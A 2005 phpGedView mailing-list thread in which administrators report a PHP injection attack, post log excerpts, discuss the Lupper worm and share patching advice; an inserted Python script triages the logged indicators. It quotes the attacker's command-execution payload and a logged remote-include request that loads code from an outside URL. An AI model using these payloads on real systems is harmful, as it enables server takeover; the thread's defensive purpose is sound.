Thread: [Phpgedview-talk] attack attempt
From: Matthew G. <ma...@po...> - 2005-12-20 19:31:56
Hi all,

I had a curious user request on my phpGedView site. Looks like they're attempting some PHP injection style attack, using PHP code in the email address and other field in the user table, like this:

\';error_reporting(0);if(isset($suntzu)) {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'

From my log files it looks like the attacker was trying to download a linux binary and a PHP script using wget. I grabbed the target files and can provide a sample if anyone is interested in trying to un-pick what they do (know a good linux dis-assembler?).

Doesn't look like they managed to do anything nasty, probably because wget isn't available on my server. Just a heads up for everyone to keep an eye out. Grep your logs for wget.

I reported the incident to SANS and they said they have seen it and sent me this link, which looks like a published version of the exploit:

http://www.milw0rm.com/id.php?id=1379

...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 final, so I think I would have been infected if I had had wget installed. Watch yourselves!

I'm guessing we need a patch of some sort.

Regards,
--
Matthew
From: Heike El-A. - T. <hei...@ya...> - 2005-12-20 19:57:43
Hi Matthew,

had an attack also. I am using 3.2.2. final. What is this wget?

Regards,
Heike

Matthew Gates <ma...@po...> wrote:
> Hi all,
>
> I had a curious user request on my phpGedView site. Looks like they're attempting some PHP injection style attack, using PHP code in the email address and other field in the user table, like this:
>
> \';error_reporting(0);if(isset($suntzu)) {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
>
> From my log files it looks like the attacker was trying to download a linux binary and a PHP script using wget. I grabbed the target files and can provide a sample if anyone is interested in trying to un-pick what they do (know a good linux dis-assembler?).
>
> Doesn't look like they managed to do anything nasty, probably because wget isn't available on my server. Just a heads up for everyone to keep an eye out. Grep your logs for wget.
>
> I reported the incident to SANS and they said they have seen it and sent me this link, which looks like a published version of the exploit:
>
> http://www.milw0rm.com/id.php?id=1379
>
> ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 final, so I think I would have been infected if I had had wget installed. Watch yourselves!
>
> I'm guessing we need a patch of some sort.
>
> Regards,
> --
> Matthew
From: Matthew G. <ma...@po...> - 2005-12-20 20:07:07
wget is a command line tool for downloading web pages. You can use it for mirroring pages (making local copies of pages) and all sorts. It's a very useful little tool, and is commonly installed on unix-like operating systems. In this case the attacker is trying to use it to download some program (to do something - who knows what, but I bet it's not friendly).

On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote:
> Hi Matthew,
> had an attack also.
> I am using 3.2.2. final.
> What is this wget?
> Regards,
> Heike
>
> Matthew Gates <ma...@po...> wrote:
> Hi all,
>
> I had a curious user request on my phpGedView site. Looks like they're attempting some PHP injection style attack, using PHP code in the email address and other field in the user table, like this:
>
> \';error_reporting(0);if(isset($suntzu)) {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
>
> From my log files it looks like the attacker was trying to download a linux binary and a PHP script using wget. I grabbed the target files and can provide a sample if anyone is interested in trying to un-pick what they do (know a good linux dis-assembler?).
>
> Doesn't look like they managed to do anything nasty, probably because wget isn't available on my server. Just a heads up for everyone to keep an eye out. Grep your logs for wget.
>
> I reported the incident to SANS and they said they have seen it and sent me this link, which looks like a published version of the exploit:
>
> http://www.milw0rm.com/id.php?id=1379
>
> ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 final, so I think I would have been infected if I had had wget installed. Watch yourselves!
>
> I'm guessing we need a patch of some sort.
>
> Regards,
From: Heike El-A. - T. <hei...@ya...> - 2005-12-20 20:20:56
thanks for info. As my pc is not linux-operated I assume no harm was done. Checked my phpGedView-log and saw that the hacker failed to login. Uploaded the patch anyway.

Heike

Matthew Gates <ma...@po...> wrote:
> wget is a command line tool for downloading web pages. You can use it for mirroring pages (making local copies of pages) and all sorts. It's a very useful little tool, and is commonly installed on unix-like operating systems. In this case the attacker is trying to use it to download some program (to do something - who knows what, but I bet it's not friendly).
>
> On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote:
> > Hi Matthew,
> > had an attack also.
> > I am using 3.2.2. final.
> > What is this wget?
> > Regards,
> > Heike
> >
> > Matthew Gates wrote:
> > Hi all,
> >
> > I had a curious user request on my phpGedView site. Looks like they're attempting some PHP injection style attack, using PHP code in the email address and other field in the user table, like this:
> >
> > \';error_reporting(0);if(isset($suntzu)) {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
> >
> > From my log files it looks like the attacker was trying to download a linux binary and a PHP script using wget. I grabbed the target files and can provide a sample if anyone is interested in trying to un-pick what they do (know a good linux dis-assembler?).
> >
> > Doesn't look like they managed to do anything nasty, probably because wget isn't available on my server. Just a heads up for everyone to keep an eye out. Grep your logs for wget.
> >
> > I reported the incident to SANS and they said they have seen it and sent me this link, which looks like a published version of the exploit:
> >
> > http://www.milw0rm.com/id.php?id=1379
> >
> > ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 final, so I think I would have been infected if I had had wget installed. Watch yourselves!
> >
> > I'm guessing we need a patch of some sort.
> >
> > Regards,
From: Tastiger <tas...@sc...> - 2005-12-20 20:50:26
Looks as though we are all getting the same person(s) trying this - looks as though mine didn't make it through registration. Seems as though he is using the same registration name everywhere... SUNTZU3645

Hello suntzu ...

A request was received at (snip) to create an account with your email address ( \';error_reporting(0);if(isset($suntzu)){system($_GET[suntzu]);die(\'HiMaster!\');}echo\' ). Information about the request is shown under the link below. Please click on the following link and fill in the requested data to verify your account and email address.

I have applied the patch anyway - thanks for that!

At 06:31 21/12/2005, you wrote:
> I had a curious user request on my phpGedView site. Looks like they're attempting some PHP injection style attack, using PHP code in the email address and other field in the user table, like this
From: Tastiger <tas...@sc...> - 2005-12-20 21:38:55
Does anyone know if this attack dumps a file anywhere in your directories? I've just received another 2 registration attempts from the same attack - so I'm wondering if they have managed to inject a file somewhere? |
From: Johan B. <mai...@go...> - 2005-12-25 10:25:26
Hi Folks,

Another attempt here at http://barelds.good-it.com. See below a piece from my webserver logs:

---------------------
81.91.66.220 - - [25/Dec/2005:05:38:06 +0100] "GET /phpgedview/help_text_vars.php?suntzu=df&PGV_BASE_DIRECTORY=http://mondomix-planet.com/radio/encrypt.txt HTTP/1.1" 200 64 "-" "Ziggy -- The Clown From Hell!!"
87.64.24.78 - - [25/Dec/2005:05:39:02 +0100] "GET /phpgedview/?suntzu=ls HTTP/1.1" 200 1542 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Sgrunt| V109|1012|S214027450|dialno; snprtz|dialno)"
---------------------

The URL mentioned in the log is still there and available. Perhaps someone should notify the ISP?

Grz.
Johan

On Tuesday 20 December 2005 20:31, Matthew Gates wrote:
> Hi all,
>
> I had a curious user request on my phpGedView site. Looks like they're attempting some PHP injection style attack, using PHP code in the email address and other field in the user table, like this:
>
> \';error_reporting(0);if(isset($suntzu)) {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
>
> From my log files it looks like the attacker was trying to download a linux binary and a PHP script using wget. I grabbed the target files and can provide a sample if anyone is interested in trying to un-pick what they do (know a good linux dis-assembler?).
>
> Doesn't look like they managed to do anything nasty, probably because wget isn't available on my server. Just a heads up for everyone to keep an eye out. Grep your logs for wget.
>
> I reported the incident to SANS and they said they have seen it and sent me this link, which looks like a published version of the exploit:
>
> http://www.milw0rm.com/id.php?id=1379
>
> ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 final, so I think I would have been infected if I had had wget installed. Watch yourselves!
>
> I'm guessing we need a patch of some sort.
>
> Regards,

--
Kind Regards,
Johan Barelds
Good-IT!
Tel. +31(0)70-3296957
Mob. +31(0)6-54253750
Martinus Nijhoffweg 42
2548 EP Den Haag
j.b...@go...
http://www.good-it.com
From: S.C. G. <alp...@gm...> - 2005-12-25 22:50:51
My server has been getting hit hard.

Much of their attempts seem random, they try for subdirectories to applications I don't even have. Such as the following subdirs: mambo, drupal, blog, xmlrpc, phpgroupware, awstats etc... mainly they are looking for "xmlrpc.php".

The most brutal attacks come from
222.90.66.197
sys-206.196.101.28.primary.net
62.206.128.46
host.osmnetworks.net
mail.ctbullet.org

You may see my analog reports for yourself http://vinland.ath.cx/analog, and if you'd like to see my http error logs, I will post those as well.

P.S. I run an AlphaServer 1200 with FreeBSD. The only public reference to my server is my family tree listed on the phpgedview.net site. My server has been up for 5 days, and has been getting attacked non stop since I posted my site on phpgedview.net. phpgedview should do something about the hackers using their list.

---
---S.C. Gehl, 'Beauty to Burn'
From: Tastiger <tas...@sc...> - 2005-12-25 23:24:53
I'm not sure that blocking IPs is going to achieve anything as the IP address will rarely reflect the true IP of the attacker.

I haven't blocked any IPs - but applied both the patched files and I haven't had any attempts since.

If you have a look at your Phpgedview logs - you will see that they are attempting to login

E.g.:

21.12.2005 07:21:22 - 195.2.72.54 - Login Failed ->HiMaster!<-
21.12.2005 07:21:25 - 195.2.72.54 - User registration requested for: SUNTZU6312
21.12.2005 07:21:26 - 195.2.72.54 - Anonymous user added user -> SUNTZU6312 <-
21.12.2005 07:23:29 - 195.2.72.54 - Login Failed ->HiMaster!<-
21.12.2005 07:23:32 - 195.2.72.54 - User registration requested for: SUNTZU3645
21.12.2005 07:23:32 - 195.2.72.54 - Anonymous user added user -> SUNTZU3645 <-
21.12.2005 07:52:58 - 203.221.137.137 - Shane deleted user -> SUNTZU3645 <-
21.12.2005 07:53:07 - 203.221.137.137 - Shane deleted user -> SUNTZU3645 <-
21.12.2005 07:53:10 - 203.221.137.137 - Shane deleted user -> SUNTZU6312 <-
21.12.2005 08:19:53 - 84.204.210.34 - Login Failed ->HiMaster!<-
21.12.2005 08:19:56 - 84.204.210.34 - User registration requested for: SUNTZU1609
21.12.2005 08:19:56 - 84.204.210.34 - Anonymous user added user -> SUNTZU1609 <-
21.12.2005 08:20:43 - 84.204.210.34 - Login Failed ->HiMaster!<-
21.12.2005 08:20:47 - 84.204.210.34 - User registration requested for: SUNTZU4643
21.12.2005 08:20:47 - 84.204.210.34 - Anonymous user added user -> SUNTZU4643 <-
21.12.2005 10:09:13 - 67.19.24.66 - Login Failed ->HiMaster!<-
21.12.2005 10:09:17 - 67.19.24.66 - User registration requested for: SUNTZU5926
21.12.2005 10:09:17 - 67.19.24.66 - Anonymous user added user -> SUNTZU5926 <-
21.12.2005 10:09:32 - 67.19.24.66 - Login Failed ->HiMaster!<-
21.12.2005 10:09:36 - 67.19.24.66 - User registration requested for: SUNTZU9533

If your permission settings are set up properly it shouldn't be an issue.

And as you can see from this excerpt of the log they have used 2 different IPs in a matter of minutes.

At 09:50 26/12/2005, you wrote:
> My server has been getting hit hard.
>
> Much of their attempts seem random, they try for subdirectories to applications I don't even have. Such as the follow subdirs, mambo, drupal, blog, xmlrpc, phpgroupware, awstats etc... mainly they are looking for " xmlrpc.php"
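A defender-side triage script for the two kinds of evidence posted in this thread, Johan's Apache access-log lines and Tastiger's phpGedView log excerpt. This is an added example, not code from the thread or the phpGedView project; the sample log lines, addresses and host name are constructed, modelled on what the posters saw.

```python
"""Flags the indicators reported in this thread: a `suntzu` query parameter (the
name the injected PHP tests before calling system()), PGV_BASE_DIRECTORY set to a
remote URL, "Login Failed ->HiMaster!<-" entries and SUNTZU<digits> registrations.
Added example; sample lines are constructed, not taken from any real server."""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache common/combined log: IP ident user [ts] "METHOD target proto" status ...
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')
# phpGedView log: "21.12.2005 07:21:22 - 192.0.2.20 - Login Failed ->HiMaster!<-"
PGV_RE = re.compile(r'^\d{2}\.\d{2}\.\d{4} \d{2}:\d{2}:\d{2} - (?P<ip>\S+) - (?P<msg>.*)$')
SUNTZU_USER_RE = re.compile(r'\bSUNTZU\d+\b')
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def scan_access_line(line):
    """Return (ip, indicator) pairs for one Apache access-log line."""
    m = ACCESS_RE.match(line)
    if not m:
        return []
    findings = []
    for key, value in parse_qsl(urlsplit(m.group('target')).query, keep_blank_values=True):
        if key == 'suntzu':
            findings.append((m.group('ip'), 'suntzu command parameter: %s' % value))
        if REMOTE_URL_RE.match(value):  # include-path hijack, e.g. PGV_BASE_DIRECTORY=http://...
            findings.append((m.group('ip'), 'remote URL in parameter %s' % key))
    return findings


def scan_pgv_line(line):
    """Return (ip, indicator) pairs for one phpGedView log line."""
    m = PGV_RE.match(line)
    if not m:
        return []
    msg, findings = m.group('msg'), []
    if msg.startswith('Login Failed') and 'HiMaster!' in msg:
        findings.append((m.group('ip'), 'login probe with HiMaster! marker'))
    user = SUNTZU_USER_RE.search(msg)
    # Registrations only; the admin's later "deleted user" clean-up lines are not flagged
    if user and ('registration requested' in msg or 'added user' in msg):
        findings.append((m.group('ip'), 'SUNTZU account: %s' % user.group(0)))
    return findings


def triage(access_lines, pgv_lines):
    """Group indicators by source IP: {ip: sorted list of indicator strings}."""
    by_ip = {}
    for scan, lines in ((scan_access_line, access_lines), (scan_pgv_line, pgv_lines)):
        for line in lines:
            for ip, ind in scan(line):
                by_ip.setdefault(ip, set()).add(ind)
    return {ip: sorted(inds) for ip, inds in by_ip.items()}


# Constructed samples (RFC 5737 addresses, example.invalid host), modelled on the thread
SAMPLE_ACCESS = [
    '192.0.2.10 - - [25/Dec/2005:05:38:06 +0100] "GET /phpgedview/help_text_vars.php'
    '?suntzu=df&PGV_BASE_DIRECTORY=http://example.invalid/encrypt.txt HTTP/1.1" 200 64 "-" "Ziggy"',
    '192.0.2.11 - - [25/Dec/2005:05:39:02 +0100] "GET /phpgedview/?suntzu=ls HTTP/1.1" 200 1542 "-" "Moz"',
    '192.0.2.12 - - [25/Dec/2005:06:00:00 +0100] "GET /phpgedview/index.php?ged=x.ged HTTP/1.1" 200 9001 "-" "Moz"',
]
SAMPLE_PGV = [
    '21.12.2005 07:21:22 - 192.0.2.20 - Login Failed ->HiMaster!<-',
    '21.12.2005 07:21:25 - 192.0.2.20 - User registration requested for: SUNTZU6312',
    '21.12.2005 07:21:26 - 192.0.2.20 - Anonymous user added user -> SUNTZU6312 <-',
    '21.12.2005 07:52:58 - 192.0.2.30 - Shane deleted user -> SUNTZU6312 <-',
]
```

Running `triage(SAMPLE_ACCESS, SAMPLE_PGV)` groups the hits by source address, so the benign request from 192.0.2.12 and the admin clean-up from 192.0.2.30 do not appear, while each probing address lists what it tried.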
From: S.C. G. <alp...@gm...> - 2005-12-25 23:33:06
Yes, but bandwidth and anonymity are important... If they continue to hack me, my ISP will know I am running a server. I tossed up PF firewall and snort, plus blocked them at my Linksys router... Nevertheless.

What kind of loser tries to deface a family tree? Where is the gain? How are they making money at this? They are not American, so they do not have the mindless destroyer excuse. ... it's puzzling.

Nevertheless, they are attacking everyone on the phpgedview list. The list should be revised. It needs to have contact info not url info.

On 12/25/05, Tastiger <tas...@sc...> wrote:
>
> I'm not sure that blocking IPs is going to achieve anything as the IP address will rarely reflect the true IP of the attacker.
>
> I haven't blocked any IPs - but applied both the patched files and I haven't had any attempts since.
>
> If you have a look at your Phpgedview logs - you will see that they are attempting to login
>
> EG:
>
> 21.12.2005 07:21:22 - 195.2.72.54 - Login Failed ->HiMaster!<-
> 21.12.2005 07:21:25 - 195.2.72.54 - User registration requested for: SUNTZU6312
> 21.12.2005 07:21:26 - 195.2.72.54 - Anonymous user added user -> SUNTZU6312 <-
> 21.12.2005 07:23:29 - 195.2.72.54 - Login Failed ->HiMaster!<-
> 21.12.2005 07:23:32 - 195.2.72.54 - User registration requested for: SUNTZU3645
> 21.12.2005 07:23:32 - 195.2.72.54 - Anonymous user added user -> SUNTZU3645 <-
> 21.12.2005 07:52:58 - 203.221.137.137 - Shane deleted user -> SUNTZU3645 <-
> 21.12.2005 07:53:07 - 203.221.137.137 - Shane deleted user -> SUNTZU3645 <-
> 21.12.2005 07:53:10 - 203.221.137.137 - Shane deleted user -> SUNTZU6312 <-
> 21.12.2005 08:19:53 - 84.204.210.34 - Login Failed ->HiMaster!<-
> 21.12.2005 08:19:56 - 84.204.210.34 - User registration requested for: SUNTZU1609
> 21.12.2005 08:19:56 - 84.204.210.34 - Anonymous user added user -> SUNTZU1609 <-
> 21.12.2005 08:20:43 - 84.204.210.34 - Login Failed ->HiMaster!<-
> 21.12.2005 08:20:47 - 84.204.210.34 - User registration requested for: SUNTZU4643
> 21.12.2005 08:20:47 - 84.204.210.34 - Anonymous user added user -> SUNTZU4643 <-
> 21.12.2005 10:09:13 - 67.19.24.66 - Login Failed ->HiMaster!<-
> 21.12.2005 10:09:17 - 67.19.24.66 - User registration requested for: SUNTZU5926
> 21.12.2005 10:09:17 - 67.19.24.66 - Anonymous user added user -> SUNTZU5926 <-
> 21.12.2005 10:09:32 - 67.19.24.66 - Login Failed ->HiMaster!<-
> 21.12.2005 10:09:36 - 67.19.24.66 - User registration requested for: SUNTZU9533
>
> If your permission settings are set up properly it shouldn't be an issue
>
> And as you can see from this excerpt of the log they have used 2 different IPs in a matter of minutes
>
> At 09:50 26/12/2005, you wrote:
> > My server has been getting hit hard.
> >
> > Much of their attempts seem random, they try for subdirectories to applications I don't even have. Such as the follow subdirs, mambo, drupal, blog, xmlrpc, phpgroupware, awstats etc... mainly they are looking for " xmlrpc.php"

--
---S.C. Gehl, 'Beauty to Burn'
From: Keith C. <ke...@dr...> - 2005-12-26 04:18:55
S.C. Gehl wrote:
> Never-the-less, they are attacking everyone on the phpgedview list.
> the list should be revised. It needs to have contact info not url info.

Not to say you're wrong, but these attacks are more closely related to an XML-RPC for PHP vulnerability attack. I'm not sure at the moment if PhpGedView uses XML-RPC directly, but many of the servers that host PhpGedView sites do have it enabled. Many of these servers are shared servers with hundreds to thousands of web sites being hosted from each one.

The majority of these attacks seem to be coming from a variant of the Lupper worm. Please see: http://vil.nai.com/vil/content/v_136821.htm

[quote]
The Lupper worm variants spread by exploiting web servers hosting vulnerable PHP/CGI scripts. At least one variant has been identified as a modified derivative of the Linux/Slapper <http://vil.nai.com/vil/content/v_99693.htm> and BSD/Scalper <http://vil.nai.com/vil/content/v_99539.htm> worms from which it inherits the propagation strategy. The worm blindly attacks web servers by sending malicious HTTP requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.
[/quote]

Most viruses are easily altered to attack specific sites. The Lupper worm in general tries to find sites that use content management systems like PHP-Nuke, Post-Nuke, Mambo, xoops, wordpress, etc. I probably wouldn't be too far off to say someone has altered this to look for unpatched PhpGedView sites. As Tastiger said, "it's because it's there and it can be done. To them it's a game and to see who can hack the most sites".

Your best line of defense here is to upgrade/update your PhpGedView site with the patch provided by John, or upgrade to PhpGedView 4.0b3 which has this patch already applied.

If you host your own server, you'll want to make sure you have XML-RPC for PHP updated to the latest version (http://sourceforge.net/project/showfiles.php?group_id=34455). If you host through a hosting provider, contact your help desk and ask them to make sure this vulnerability has been addressed, since they are responsible for the day to day maintenance of your servers.

Eventually this will die down, and things will become normal again until the next vulnerability is found. Welcome to the world of web hosting. It's a cat and mouse game in which you can't let your guard down for a moment.

For further reading, please take a look here, and follow the other links as well.
http://isc.sans.org/diary.php?storyid=823
From: Tastiger <tas...@sc...> - 2005-12-26 03:01:00
Don't blame the list - I'm not on it - and I had an attempt - but then I have 5 Postnuke sites so I'm used to these script kiddies and their antics.

If you want to know why they do it - well it's because it's there and it can be done. To them it's a game and to see who can hack the most sites - doesn't matter if it's a private family tree or some huge business. I run a support group for alternative lifestyles that has been hit 5 times in the past 12 months and they still keep looking for vulnerabilities even though I have upgraded the site regularly.

As for anonymity - well once you run a server, I'm afraid that is something that one must lose - if you want anonymity then don't have a web site and I'm sorry but if you are running a server without your ISP's knowledge that seems like a personal problem to me.

The point I am making is don't blame the list for these attempts - if you want to find sites using Phpgedview anyone can do a Google on that key word and come up with links to sites running Phpgedview.

The bottom line is there was a vulnerability in the package and that hole has now been plugged - until someone finds a new hole then we do it all over again - welcome to the world of PHP :-D

At 10:32 26/12/2005, you wrote:
> Never-the-less, they are attacking everyone on the phpgedview list.
> the list should be revised. It needs to have contact info not url info.